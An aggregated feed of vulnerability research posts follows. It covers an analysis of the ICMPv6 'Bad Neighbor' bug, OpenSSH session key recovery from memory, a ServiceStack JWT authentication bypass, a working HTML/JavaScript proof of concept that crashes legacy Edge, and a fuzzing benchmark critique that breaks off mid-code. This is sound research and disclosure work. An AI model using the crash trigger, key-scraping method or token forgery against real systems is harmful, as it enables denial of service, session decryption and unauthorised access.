Normal view

There are new articles available, click to refresh the page.
Before yesterdayVulnerabily Research

Exploring the Exploitability of “Bad Neighbor”: The Recent ICMPv6 Vulnerability (CVE-2020-16898)

11 November 2020 at 19:59
Exploring the Exploitability of “Bad Neighbor”: The Recent ICMPv6 Vulnerability (CVE-2020-16898)

At the Patch Tuesday on October 13, Microsoft published a patch and an advisory for CVE-2020-16898, dubbed “Bad Neighbor”, which was undoubtedly the highlight of the monthly series of patches. The bug has received a lot of attention since it was published as an RCE vulnerability, meaning that with a successful exploitation it could be made wormable. Initially, it was graded with a high CVSS score of 9.8/10, though it was later lowered to 8.8.

In days following the publication, several write-ups and POCs were published. We looked at some of them:

The writeup by pi3 contains details that are not mentioned in the writeup by Quarkslab. It’s important to note that the bug can only be exploited when the source address is a link-local address. That’s a significant limitation, meaning that the bug cannot be exploited over the internet. In any case, both writeups explain the bug in general and then dive into triggering a buffer overflow, causing a system crash, without exploring other options.

We wanted to find out whether something else could be done with this vulnerability, aside from triggering the buffer overflow and causing a blue screen (BSOD)

In this writeup, we’ll share our findings.

The bug in a nutshell

The bug happens in the tcpip!Ipv6pHandleRouterAdvertisement function, which is responsible for handling incoming ICMPv6 packets of the type Router Advertisement (part of the Neighbor Discovery Protocol).

The packet structure is (RFC 4861):

 0                   1                   2                   3
 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|     Type      |     Code      |          Checksum             |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Cur Hop Limit |M|O|  Reserved |       Router Lifetime         |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|                         Reachable Time                        |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|                          Retrans Timer                        |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|   Options ...
+-+-+-+-+-+-+-+-+-+-+-+-

As can be seen from the packet structure, the packet consists of a 16-bytes header, followed by a variable amount of option structures. Each option structure begins with a type field and a length field, followed by specific fields for the relevant option type.

The bug happens due to an incorrect handling of the Recursive DNS Server Option (type 25, RFC 5006):

 0                   1                   2                   3
 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|     Type      |     Length    |           Reserved            |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|                           Lifetime                            |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|                                                               |
:            Addresses of IPv6 Recursive DNS Servers            :
|                                                               |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

The Length field defines the length of the option in units of 8 bytes. The option header size is 8 bytes, and each IPv6 address adds additional 16 bytes to the length. That means that if the structure contains n IPv6 addresses, the length is supposed to be set to 1+2*n. The bug happens when the length is an even number, causing the code to incorrectly interpret the beginning of the next option structure.

Visualizing the POC of 0xeb-bp

As a starting point, let’s visualize 0xeb-bp’s POC and get some intuition about what’s going on and why it causes a stack overflow. Here is the ICMPv6 packet as constructed in the source code:

As you can see, the ICMPv6 packet is followed by two Recursive DNS Server options (type 25), and then a 256-bytes buffer. The two options have an even length of 4, which triggers the bug.

The tcpip!Ipv6pHandleRouterAdvertisement function that parses the packet does two iterations over the option structures. The first iteration does simple checks such as verifying the length field of the structures. The second iteration actually parses the option structures. Because of the bug, each iteration interprets the packet differently.

Here’s how the first iteration sees the packet:

Each option structure is just skipped according to the length field after doing some basic checks.

Here’s how the second iteration sees it:

This time, in the case of a Recursive DNS Server option, the length field is used to determine the amount of IPv6 addresses, which is calculated as following:

amount_of_addr = (length – 1) / 2

Then, the IPv6 addresses are processed, and the next iteration continues after the last processed IPv6 address, which, in case of an even length value, happens to be in the middle of the option structure compared to what the first iteration sees. This results in processing an option structure which wasn’t validated in the first iteration. 

Specifically in this POC, 34 is not a valid length for option of the type 24, but because it wasn’t validated, the processing continues and too many bytes are copied on the stack, causing a stack overflow. Noteworthy, fragmentation is required for triggering the stack overflow (see the Quarkslab writeup for details).

Zooming out

Now we know how to trigger a stack overflow using CVE-2020-16898, but what are the checks that are made in each of the mentioned iterations? What other checks, aside from the length check, can we bypass using this bug? Which option types are supported, and is the handling different for each of them? 

We didn’t find answers to these questions in any writeup, so we checked it ourselves.

Here are the relevant parts of the Ipv6pHandleRouterAdvertisement function, slightly simplified:

void Ipv6pHandleRouterAdvertisement(...)
{
    // Initialization and other code...

    if (!IsLinkLocalAddress(SrcAddress) && !IsLoopbackAddress(SrcAddress))
        // error

    // Initialization and other code...

    NET_BUFFER NetBuffer = /* ... */;

    // First loop
    while (NetBuffer->DataLength >= 2)
    {
        BYTE TempTypeLen[2];
        BYTE* TempTypeLenPtr = NdisGetDataBuffer(NetBuffer, 2, TempTypeLen, 1, 0);
        WORD OptionLenInBytes = TempTypeLenPtr[1] * 8;
        if (OptionLenInBytes == 0 || OptionLenInBytes > NetBuffer->DataLength)
            // error

        BYTE OptionType = TempTypeLenPtr[0];
        switch (OptionType)
        {
        case 1: // Source Link-layer Address
            // ...
            break;

        case 3: // Prefix Information
            if (OptionLenInBytes != 0x20)
                // error

            BYTE TempPrefixInfo[0x20];
            BYTE* TempPrefixInfoPtr = NdisGetDataBuffer(NetBuffer, 0x20, TempPrefixInfo, 1, 0);
            BYTE PrefixInfoPrefixLength = TempRouteInfoPtr[2];
            if (PrefixInfoPrefixLength > 128)
                // error
            break;

        case 5: // MTU
            // ...
            break;

        case 24: // Route Information Option
            if (OptionLenInBytes > 0x18)
                // error

            BYTE TempRouteInfo[0x18];
            BYTE* TempRouteInfoPtr = NdisGetDataBuffer(NetBuffer, 0x18, TempRouteInfo, 1, 0);
            BYTE RouteInfoPrefixLength = TempRouteInfoPtr[2];
            if (RouteInfoPrefixLength > 128 ||
                (RouteInfoPrefixLength > 64 && OptionLenInBytes < 0x18) ||
                (RouteInfoPrefixLength > 0 && OptionLenInBytes < 0x10))
                // error
            break;

        case 25: // Recursive DNS Server Option
            if (OptionLenInBytes < 0x18)
                // error

            // Added after the patch - this it the fix
            //if (OptionLenInBytes - 8 % 16 != 0)
            //    // error
            break;

        case 31: // DNS Search List Option
            if (OptionLenInBytes < 0x10)
                // error
            break;
        }

        NetBuffer->DataOffset += OptionLenInBytes;
        NetBuffer->DataLength -= OptionLenInBytes;
        // Other adjustments for NetBuffer...
    }

    // Rewind NetBuffer and do other stuff...

    // Second loop...
    while (NetBuffer->DataLength >= 2)
    {
        BYTE TempTypeLen[2];
        BYTE* TempTypeLenPtr = NdisGetDataBuffer(NetBuffer, 2, TempTypeLen, 1, 0);
        WORD OptionLenInBytes = TempTypeLenPtr[1] * 8;
        if (OptionLenInBytes == 0 || OptionLenInBytes > NetBuffer->DataLength)
            // error

        BOOL AdvanceBuffer = TRUE;

        BYTE OptionType = TempTypeLenPtr[0];
        switch (OptionType)
        {
        case 3: // Prefix Information
            BYTE TempPrefixInfo[0x20];
            BYTE* TempPrefixInfoPtr = NdisGetDataBuffer(NetBuffer, 0x20, TempPrefixInfo, 1, 0);
            BYTE PrefixInfoPrefixLength = TempRouteInfoPtr[2];
            // Lots of code. Assumptions:
            // PrefixInfoPrefixLength <= 128
            break;

        case 24: // Route Information Option
            BYTE TempRouteInfo[0x18];
            BYTE* TempRouteInfoPtr = NdisGetDataBuffer(NetBuffer, 0x18, TempRouteInfo, 1, 0);
            BYTE RouteInfoPrefixLength = TempRouteInfoPtr[2];
            // Some code. Assumptions:
            // PrefixInfoPrefixLength <= 128
            // Other, less interesting assumptions about PrefixInfoPrefixLength
            break;

        case 25: // Recursive DNS Server Option
            Ipv6pUpdateRDNSS(..., NetBuffer, ...);
            AdvanceBuffer = FALSE;
            break;

        case 31: // DNS Search List Option
            Ipv6pUpdateDNSSL(..., NetBuffer, ...);
            AdvanceBuffer = FALSE;
            break;
        }

        if (AdvanceBuffer)
        {
            NetBuffer->DataOffset += OptionLenInBytes;
            NetBuffer->DataLength -= OptionLenInBytes;
            // Other adjustments for NetBuffer...
        }
    }

    // More code...
}

As can be seen from the code, only 6 option types are supported in the first loop, the others are ignored. In any case, each header is skipped precisely according to the Length field.

Even less options, 4, are supported in the second loop. And similarly to the first loop, each header is skipped precisely according to the Length field, but this time with two exceptions: types 24 (the Route Information Option) and 25 (Recursive DNS Server Option) have functions which adjust the network buffer pointers by themselves, creating an opportunity for inconsistencies. 

That’s exactly what is happening with this bug – the Ipv6pUpdateRDNSS function doesn’t adjust the network buffer pointers as expected when the length field is even.

Breaking assumptions

Essentially, this bug allows us to break the assumptions made by the second loop that are supposed to be verified in the first loop. The only option types that are relevant are the 4 types which appear in both loops, that’s also why we didn’t include the other 2 in the code of the first loop. One such assumption is the value of the length field, and that’s how the buffer overflow POC works, but let’s revisit them all and see what can be achieved.

  • Option type 3 – Prefix Information
    • The option structure size must be 0x20 bytes. Breaking this assumption is what allows us to trigger the stack overflow, by providing a larger option structure. We can also provide a smaller structure, but that doesn’t have much value in this case.
    • The Prefix Length field value must be at most 128. Breaking this assumption allows us to set the field to an invalid value in the range of 129-255. This can indeed be used to cause an out-of-bounds data write, but in all such cases that we could find, the out-of-bounds write happens on the stack in a location which is overridden later anyway, so causing such out-of-bounds writes has no practical value.

      For example, one such out-of-bounds write happens in tcpip!Ipv6pMakeRouteKey, called by tcpip!IppValidateSetAllRouteParameters.
  • Option type 24 – Route Information Option
    • The option structure size must not be larger than 0x18 bytes. Same implications as for option type 3.
    • The Prefix Length field value must be at most 128. Same implications as for option type 3.
    • The Prefix Length field value must fit the structure option size. That isn’t really interesting since any value in the range 0-128 is handled correctly. The worst thing that could happen here is a small out-of-bounds read.
  • Option type 25 – Recursive DNS Server Option
    • The option structure size must not be smaller than 0x18 bytes. This isn’t interesting, since the size must be at least 8 bytes anyway (the length field is verified to be larger than zero in both loops), and any such structure is handled correctly, even though a size of 8-bytes is not valid according to the specification.
    • The option structure size must be in the form of 8+n*16 bytes. This check was added after fixing CVE-2020-16898.
  • Option type 31 – DNS Search List Option
    • The option structure size must not be smaller than 0x10 bytes. Same implications as for option type 25.

As you can see, there was a slight chance of doing something other than the demonstrated stack overflow by breaking the assumption of the valid prefix length value for option type 3 or 24. Even though it’s literally about smuggling a single bit, sometimes that’s enough. But it looks like this time we weren’t that lucky.

Revisiting the Stack Overflow

Before giving up, we took a closer look at the stack. The POCs that we’ve seen are overriding the stack such that the stack cookie (the __security_cookie value) is overridden, causing a system crash before the function returns.

We checked whether overriding anything on the stack can help achieve code execution before the function returns. That can be a local variable in the “Local variables (2)” space, or any variable in the previous frames that might be referenced inside the function. Unfortunately, we came to the conclusion that all the variables in the “Local variables (2)” space are output buffers that are modified before access, and no data from the previous frames is accessed.

Summary

We conclude with high confidence that CVE-2020-16898 is not exploitable without an additional vulnerability. It is possible that we may have missed something. Any insights / feedback is welcome. Even though we weren’t able to exploit the bug, we enjoyed the research, and we hope that you enjoyed this writeup as well.

Hear the news first

  • Only essential content
  • New vulnerabilities & announcements
  • News from ZecOps Research Team

Your subscription request to ZecOps Blog has been successfully sent.
We won’t spam, pinky swear 🤞

Decrypting OpenSSH sessions for fun and profit

11 November 2020 at 10:24

Author: Jelle Vergeer

Introduction

A while ago we had a forensics case in which a Linux server was compromised and a modified OpenSSH binary was loaded into the memory of a webserver. The modified OpenSSH binary was used as a backdoor to the system for the attackers. The customer had pcaps and a hypervisor snapshot of the system on the moment it was compromised. We started wondering if it was possible to decrypt the SSH session and gain knowledge of it by recovering key material from the memory snapshot. In this blogpost I will cover the research I have done into OpenSSH and release some tools to dump OpenSSH session keys from memory and decrypt and parse sessions in combinarion with pcaps. I have also submitted my research to the 2020 Volatility framework plugin contest.

SSH Protocol

Firstly, I started reading up on OpenSSH and its workings. Luckily, OpenSSH is opensource so we can easily download and read the implementation details. The RFC’s, although a bit boring to read, were also a wealth of information. From a high level overview, the SSH protocol looks like the following:

  1. SSH protocol + software version exchange
  2. Algorithm negotiation (KEX INIT)
    • Key exchange algorithms
    • Encryption algorithms
    • MAC algorithms
    • Compression algorithms
  3. Key Exchange
  4. User authentication
  5. Client requests a channel of type “session”
  6. Client requests a pseudo terminal
  7. Client interacts with session

Starting at the begin, the client connects to the server and sends the protocol version and software version:
SSH-2.0-OpenSSH_8.3. The server responds with its protocol and software version. After this initial protocol and software version exchange, all traffic is wrapped in SSH frames. SSH frames exist primarily out of a length, padding length, payload data, padding content, and MAC of the frame. An example SSH frame:

Example SSH Frame parsed with dissect.cstruct

Before an encryption algorithm is negotiated and a session key is generated the SSH frames will be unencrypted, and even when the frame is encrypted, depending on the algorithm, parts of the frame may not be encrypted. For example aes256-gcm will not encrypt the 4 bytes length in the frame, but chacha20-poly1305 will.

Next up the client will send a KEX_INIT message to the server to start negotiating parameters for the session like key exchange and encryption algorithm. Depending on the order of those algorithms the client and server will pick the first preferred algorithm that is supported by both sides. Following the KEX_INIT message, several key exchange related messages are exchanged after which a NEWKEYS messages is sent from both sides. This message tells the other side everything is setup to start encrypting the session and the next frame in the stream will be encrypted. After both sides have taken the new encryption keys in effect, the client will request user authentication and depending on the configured authentication mechanisms on the server do password/ key/ etc based authentication. After the session is authenticated the client will open a channel, and request services over that channel based on the requested operation (ssh/ sftp/ scp etc).

Recovering the session keys

The first step in recovering the session keys was to analyze the OpenSSH source code and debug existing OpenSSH binaries. I tried compiling OpenSSH myself, logging the generated session keys somewhere and attaching a debugger and searching for those in the memory of the program. Success! Session keys were kept in memory on the heap. Some more digging into the source code pointed me to the functions responsible for sending and recieving the NEWKEYS frame. I discovered there is a “ssh” structure which stores a “session_state” structure. This structure in turn holds all kinds of information related to the current SSH session inluding a newkeys structure containing information relating the encryption, mac and compression algorithm. One level deeper we finally find the “sshenc” structure holding the name of the cipher, the key, IV and the block length. Everything we need! A nice overview of the structure in OpenSSH is shown below:

SSHENC Structure and relations

And the definition of the sshenc structure:

SSHENC Structure

It’s difficult to find the key itself in memory (it’s just a string of random bytes), but the sshenc (and other) structures are more distinct, having some properties we can validate against. We can then scrape the entire memory address space of the program and validate each offset against these constraints. We can check for the following properties:

  • name, cipher, key and iv members are valid pointers
  • The name member points to a valid cipher name, which is equal to cipher->name
  • key_len is within a valid range
  • iv_len is within a valid range
  • block_size is within a valid range

If we validate against all these constraints we should be able to reliably find the sshenc structure. I started of building a POC Python script which I could run on a live host which attaches to processes and scrapes the memory for this structure. The source code for this script can be found here. It actually works rather well and outputs a json blob for each key found. So I demonstrated that I can recover the session keys from a live host with Python and ptrace, but how are we going to recover them from a memory snapshot? This is where Volatility comes into play. Volatility is a memory forensics framework written in Python with the ability to write custom plugins. And with some efforts, I was able to write a Volatility 2 plugin and was able to analyze the memory snapshot and dump the session keys! For the Volatility 3 plugin contest I also ported the plugin to Volatility 3 and submitted the plugin and research to the contest. Fingers crossed!

Volatility 2 SSH Session Key Dumper output

Decrypting and parsing the traffic

The recovery of the session keys which are used to encrypt and decrypt the traffic was succesfull. Next up is decrypting the traffic! I started parsing some pcaps with pynids, a TCP parsing and reassembly library. I used our in-house developed dissect.cstruct library to parse data structures and developed a parsing framework to parse protocols like ssh. The parsing framework basically feeds the packets to the protocol parser in the correct order, so if the client sends 2 packets and the server replies with 3 packets the packets will also be supplied in that same order to the parser. This is important to keep overall protocol state. The parser basically consumes SSH frames until a NEWKEYS frame is encountered, indicating the next frame is encrypted. Now the parser peeks the next frame in the stream from that source and iterates over the supplied session keys, trying to decrypt the frame. If successful, the parser installs the session key in the state to decrypt the remaining frames in the session. The parser can handle pretty much all encryption algorithms supported by OpenSSH. The following animation tries to depict this process:

SSH Protocol Parsing

And finally the parser in action, where you can see it decrypts and parses a SSH session, also exposing the password used by the user to authenticate:

Example decrypted and parsed SSH session

Conclusion

So to sum up, I researched the SSH protocol, how session keys are stored and kept in memory for OpenSSH, found a way to scrape them from memory and use them in a network parser to decrypt and parse SSH sessions to readable output. The scripts used in this research can be found here:

A potential next step or nice to have would be implementing this decrypter and parser into Wireshark.

Final thoughts

Funny enough, during my research I also came across these commented lines in the ssh_set_newkeys function in the OpenSSH source. How ironic! If these lines were uncommented and compiled in the OpenSSH binaries this research would have been much harder..

OpenSSH source code snippet

References

Re-discovering a JWT Authentication Bypass in ServiceStack

2 November 2020 at 08:37
TL;DR ServiceStack before version 5.9.2 failed to properly verify JWT signatures, allowing to forge arbitrary tokens and bypass authentication/authorization mechanisms. The vulnerability was discovered and patched by the ServiceStack team without highlighting the actual impact, so we chose to publish this blog post along with an advisory. Routine checks –> Auth bypass During a Web Application Penetration Test for one of our customers, I noticed that after the login process through a 3rd-party Oauth service the web application used JWT tokens to track sessions and privileges.

Crash Reproduction Series: Microsoft Edge Legacy

2 November 2020 at 07:30
Crash Reproduction Series: Microsoft Edge Legacy

During yet another Digital Forensics investigation using ZecOps Crash Forensics Platform, we saw a crash of the Legacy (pre-Chromium) Edge browser. The crash was caused by a NULL pointer dereference bug, and we concluded that the root cause was a benign bug of the browser. Nevertheless, we thought that it would be a nice showcase of a crash reproduction.

Here’s the stack trace of the crash:

00007ffa`35f4a172     edgehtml!CMediaElement::IsSafeToUse+0x8
00007ffa`36c78124     edgehtml!TrackHelpers::GetStreamIndex+0x26
00007ffa`36c7121f     edgehtml!CSourceBuffer::RemoveAllTracksHelper<CTextTrack,CTextTrackList>+0x98
00007ffa`36880903     edgehtml!CMediaSourceExtension::Var_removeSourceBuffer+0xc3
00007ffa`364e5f95     edgehtml!CFastDOM::CMediaSource::Trampoline_removeSourceBuffer+0x43
00007ffa`3582ea87     edgehtml!CFastDOM::CMediaSource::Profiler_removeSourceBuffer+0x25
00007ffa`359d07b6     Chakra!Js::JavascriptExternalFunction::ExternalFunctionThunk+0x207
00007ffa`35834ab8     Chakra!amd64_CallFunction+0x86
00007ffa`35834d38     Chakra!Js::InterpreterStackFrame::OP_CallCommon<Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallIWithICIndex<Js::LayoutSizePolicy<0> > > >+0x198
00007ffa`35834f99     Chakra!Js::InterpreterStackFrame::OP_ProfiledCallIWithICIndex<Js::OpLayoutT_CallIWithICIndex<Js::LayoutSizePolicy<0> > >+0xb8
00007ffa`3582cd80     Chakra!Js::InterpreterStackFrame::ProcessProfiled+0x149
00007ffa`3582df9f     Chakra!Js::InterpreterStackFrame::Process+0xe0
00007ffa`3582cf9e     Chakra!Js::InterpreterStackFrame::InterpreterHelper+0x88f
0000016a`bacc1f8a     Chakra!Js::InterpreterStackFrame::InterpreterThunk+0x4e
00007ffa`359d07b6     0x0000016a`bacc1f8a
00007ffa`358141ea     Chakra!amd64_CallFunction+0x86
00007ffa`35813f0c     Chakra!Js::JavascriptFunction::CallRootFunctionInternal+0x2aa
00007ffa`35813e4a     Chakra!Js::JavascriptFunction::CallRootFunction+0x7c
00007ffa`35813d29     Chakra!ScriptSite::CallRootFunction+0x6a
00007ffa`35813acb     Chakra!ScriptSite::Execute+0x179
00007ffa`362bebed     Chakra!ScriptEngineBase::Execute+0x19b
00007ffa`362bde49     edgehtml!CListenerDispatch::InvokeVar+0x41d
00007ffa`362bc6c2     edgehtml!CEventMgr::_InvokeListeners+0xd79
00007ffa`35fdf8f1     edgehtml!CEventMgr::Dispatch+0x922
00007ffa`35fe0089     edgehtml!CEventMgr::DispatchPointerEvent+0x215
00007ffa`35fe04f4     edgehtml!CEventMgr::DispatchClickEvent+0x1d1
00007ffa`36080f10     edgehtml!Tree::ElementNode::Fire_onclick+0x60
00007ffa`36080ca0     edgehtml!Tree::ElementNode::DoClick+0xf0
[...]

Amusingly, the browser crashed in the CMediaElement::IsSafeToUse function. Apparently, the answer is no – it isn’t safe to use.

Crash reproduction

The stack trace indicates that the function that was executed by the JavaScript code, and eventually caused the crash, was removeSourceBuffer, part of the MediaSource Web API. Looking for a convenient example to play with, we stumbled upon this page which uses the counterpart function, addSourceBuffer. We added a button that calls removeSourceBuffer and tried it out.

Just calling removeSourceBuffer didn’t cause a crash (otherwise it would be too easy, right?). To see how far we got, we attached a debugger and put a breakpoint on the edgehtml!CMediaSourceExtension::Var_removeSourceBuffer function, then did some stepping. We saw that the CSourceBuffer::RemoveAllTracksHelper function is not being called at all. What tracks does it help to remove?

After some searching, we learned that there’s the HTML <track> element that allows us to specify textual data, such as subtitles, for a media element. We added such an element to our sample video and bingo! Edge crashed just as we hoped.

Crash reason

Our best guess is that the crash happens because the CTextTrackList::GetTrackCount function returns an incorrect value. In our case, it returns 2 instead of 1. An iteration is then made, and the CTextTrackList::GetTrackNoRef function is called with index values from 0 to the track count (simplified):

int count = CTextTrackList::GetTrackCount();
for (int i = 0; i < count; i++) {
    CTextTrackList::GetTrackNoRef(..., i);
    /* more code... */
}

While it may look like an out-of-bounds bug, it isn’t. GetTrackNoRef returns an error for an invalid index, and for index=1 (in our case), a valid object is returned, it’s just that one of its fields is a NULL pointer. Perhaps the last value in the array is some kind of a sentinel value which was not supposed to be part of the iteration.

Exploitation

The bug is not exploitable, and can only cause a slight inconvenience by crashing the browser tab.

POC

Here’s a POC that demonstrates the crash. Save it as an html file, and place the test.mp4, foo.vtt files in the same folder.

Tested version:

  • Microsoft Edge 44.18362.449.0
  • Microsoft EdgeHTML 18.18363
<button>Crash</button>
<br><br><br>

<video autoplay controls playsinline>
    <!-- https://gist.github.com/Michael-ZecOps/046e2c97d208a0a6da2f81c3812f7d5d -->
    <track label="English" kind="subtitles" srclang="en" src="foo.vtt" default>
</video>

<script>
    // Based on: https://simpl.info/mse/
    var FILE = 'test.mp4'; // https://w3c-test.org/media-source/mp4/test.mp4
    var video = document.querySelector('video');

    var mediaSource = new MediaSource();
    video.src = window.URL.createObjectURL(mediaSource);

    mediaSource.addEventListener('sourceopen', function () {
        var sourceBuffer = mediaSource.addSourceBuffer('video/mp4; codecs="mp4a.40.2,avc1.4d400d"');

        var button = document.querySelector('button');
        button.onclick = () => mediaSource.removeSourceBuffer(mediaSource.sourceBuffers[0]);

        get(FILE, function (uInt8Array) {
            var file = new Blob([uInt8Array], {
                type: 'video/mp4'
            });

            var reader = new FileReader();

            reader.onload = function (e) {
                sourceBuffer.appendBuffer(new Uint8Array(e.target.result));
                sourceBuffer.addEventListener('updateend', function () {
                    if (!sourceBuffer.updating && mediaSource.readyState === 'open') {
                        mediaSource.endOfStream();
                    }
                });
            };

            reader.readAsArrayBuffer(file);
        });
    }, false);

    function get(url, callback) {
        var xhr = new XMLHttpRequest();
        xhr.open('GET', url, true);
        xhr.responseType = 'arraybuffer';
        xhr.send();

        xhr.onload = function () {
            if (xhr.status !== 200) {
                alert('Unexpected status code ' + xhr.status + ' for ' + url);
                return false;
            }
            callback(new Uint8Array(xhr.response));
        };
    }
</script>

Does mobile DFIR research interest you?

ZecOps is expanding. We’re looking for additional researchers to join ZecOps Research Team. If you’re interested, send us a note at [email protected].

Hear the news first

  • Only essential content
  • New vulnerabilities & announcements
  • News from ZecOps Research Team

Your subscription request to ZecOps Blog has been successfully sent.
We won’t spam, pinky swear 🤞

Some thoughts on ToB’s GPU-based fuzzing

23 October 2020 at 07:11

The blog

The blog we’re looking at today is an incredible blog by Ryan Eberhardt on the Trail of Bits blog! You should read it first, it’s really neat, there’s also some awesome graphics in it which makes it a super fun read!

Let’s build a high-performance fuzzer with GPUs!

Summary

In the ToB blog, they talk about using GPUs to fuzz. More specifically, they talk about lifting a target architecture into LLVM IR, and then emitting the LLVM IR to a binary which can run on a GPU. In this case, they’re targeting PTX assembly to run on the NVIDIA Tesla T4 GPU. This is done using a tool ToB has been working on for quite a while, called remill, which is designed for binary translation. Remill alone is incredibly impressive.

The target they picked as a benchmark is the BFP packet filtering code in libpcap, pcap_filter_with_aux_data. This function is pretty simple, and it executes a compiled BPF filter and uses it to extract information and filter a packet.

The blog talks about some of the hurdles in getting performant execution on GPUs, organization of data, handing virtual memory, etc. Once again, go read it. It’s really neat, the graphics alone make it a worthwhile read!

I’m super excited about this blog, mainly because it’s very similar to vectorized emulation that I’ve worked on in the past, and it starts answering questions about GPU-based fuzzing that I have been too lazy to look into. While this blog goes into some criticisms, it’s important to note that the research is only just starting, there is much progress to be had! It’s also important to note that this research has been being done by Ryan for only 2 months. That is incredible progress.


The Problems

Nevertheless, I have a few problems with the blog that stood out to me. I’m kind of always the asshole pointing these things out, but I think there are some important things to discuss.

The comparison

In the blog, the comparison being done and being presented is largely about comparing the performance of libfuzzer, against their GPU based fuzzer. Further, the comparisons are largely about the number of executions per second (or as I call them, fuzz cases per second), per unit US dollar. This comparison is largely to emphasize the cost efficiencies of fuzzing on the GPU, so we’ll keep that in mind. We don’t want to stray too far from their actual point.

Their hardware they’re testing on are 2 different Google Cloud Compute nodes which have various specs. The one used to benchmark libfuzzer is an n1-standard-8, this is a 4 core, 8 hyperthread, Intel Skylake machine. This costs $0.38/hour according to their blog, and of course, this checks out.

The other machine they’re testing on, for their GPU metrics, is a NVIDIA Tesla T4 single GPU compute node from Google Cloud Project. They claim this costs $0.35/hour, and once again, that’s accurate. This means the two machines are effectively the same price, and we’ll be able to compare them at a rough level without really taking into consideration their costs.

In their blog, they mention that “This isn’t an entirely fair comparison.”, and this is largely referring to that their fuzzer is not providing mutated inputs to the function, whereas libfuzzer is. This is a major issue. However, their fuzzer is resetting the state of the target every fuzz case, and libfuzzer is relying on the function not having any peristant state that needs to be reset. This gives libfuzzer a large advantage. Finally, the GPU based fuzzer also works on binaries, where libfuzzer requires source, so once again, there’s a lot of variables at play here. It is important to note, they’re mainly looking for order-of-magnitude estimates. But… this is a lot more than should be controlled for in my opinion. Important to also note that the blog concludes with a ~4x improvement from libfuzzer, thus, it’s well below the order-of-magnitude concerns of unfairness.

Of course, if you’ve read my blogs before. You’ll know I absolutely hate comparisons between problems with multiple variables. First of all, the cost of mutating an input is incredibly expensive, especially for a potentially large packet, say 1500 bytes. Further, the target which is being picked is a single function which does very little processing from first glance, but we’ll look into this more later.

So, let’s start off by eliminating one variable right away. What is the cost of generating an input from libfuzzer, and what is the cost of the actual function under test. This will effectively tell us how “fair” the execution comparison is, the binary vs source is subjective and clearly the binary-based engine is more impressive.

How do we do this? Well, let’s first figure out how fast libfuzzer can execute something that does literally nothing. This will give us a baseline of libfuzzer performance given it’s targeting something that does literally nothing.

#include <stdlib.h>
#include <stdint.h>

extern int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t Size) {
  return 0;  // Non-zero return values are reserved for future use.
}
clang-12 -fsanitize=fuzzer -O2 test.c

We’ll run this test on a Intel(R) Xeon(R) Gold 6252N CPU @ 2.30GHz turboing to 3.6 GHz. This isn’t the same as their GCP setup, but we’ll do some of our own comparisons locally, thus we’re talking about relatives and not absolutes.

They don’t talk much in their blog about what they used to seed libfuzzer, so we’ll just give it no seeds and cap the input size to 1500 bytes, or about a single MTU for a network packet.

pleb@grizzly:~/libpcap/harness$ ./a.out -max_len=1500
INFO: Running with entropic power schedule (0xFF, 100).
INFO: Seed: 2252408900
INFO: Loaded 1 modules   (1 inline 8-bit counters): 1 [0x4ea0b0, 0x4ea0b1), 
INFO: Loaded 1 PC tables (1 PCs): 1 [0x4c0840,0x4c0850), 
INFO: A corpus is not provided, starting from an empty corpus
#2      INITED cov: 1 ft: 1 corp: 1/1b exec/s: 0 rss: 27Mb
#8388608        pulse  cov: 1 ft: 1 corp: 1/1b lim: 1500 exec/s: 4194304 rss: 28Mb
#16777216       pulse  cov: 1 ft: 1 corp: 1/1b lim: 1500 exec/s: 3355443 rss: 28Mb
#33554432       pulse  cov: 1 ft: 1 corp: 1/1b lim: 1500 exec/s: 3050402 rss: 28Mb
#67108864       pulse  cov: 1 ft: 1 corp: 1/1b lim: 1500 exec/s: 3195660 rss: 28Mb
#134217728      pulse  cov: 1 ft: 1 corp: 1/1b lim: 1500 exec/s: 3121342 rss: 28Mb

Hmm, it seems it has settled in at about 3.12 million executions per second on a single core. Hmm, that seems a bit fast compared to the 1.9 million executions per second they see on their 8 thread machine in GCP, but maybe the target is really that complex and slows down performance.

Next, lets see how expensive the target code is outside of libfuzzer.

use std::time::Instant;
use pcap_sys::*;

#[link(name = "pcap")]
extern {
    fn bpf_filter_with_aux_data(
        pc: *const bpf_insn,
        p:  *const u8,
        wirelen: u32,
        buflen:  u32,
        aux_data: *const u8,
    );
}

fn main() {
    const ITERS: u64 = 100_000_000;

    unsafe {
        let mut program: bpf_program = std::mem::zeroed();

        // Ethernet linktype + 1500 snapshot length
        let pcap = pcap_open_dead(1, 1500);
        assert!(!pcap.is_null());

        // Compile the program
        let status = pcap_compile(pcap, &mut program,
            "dst host 1.2.3.4 or tcp or udp or ip or ip6 or arp or rarp or \
            atalk or aarp or decnet or iso or stp or ipx\0"
            .as_ptr() as *const _,
            1, PCAP_NETMASK_UNKNOWN);
        assert!(status == 0, "Failed to compile pcap thingy");

        let buf = vec![0u8; 1500];

        let time = Instant::now();
        for _ in 0..ITERS {
            // Filter a packet
            bpf_filter_with_aux_data(
                program.bf_insns,
                buf.as_ptr(),
                buf.len() as u32,
                buf.len() as u32,
                std::ptr::null()
            );
        }
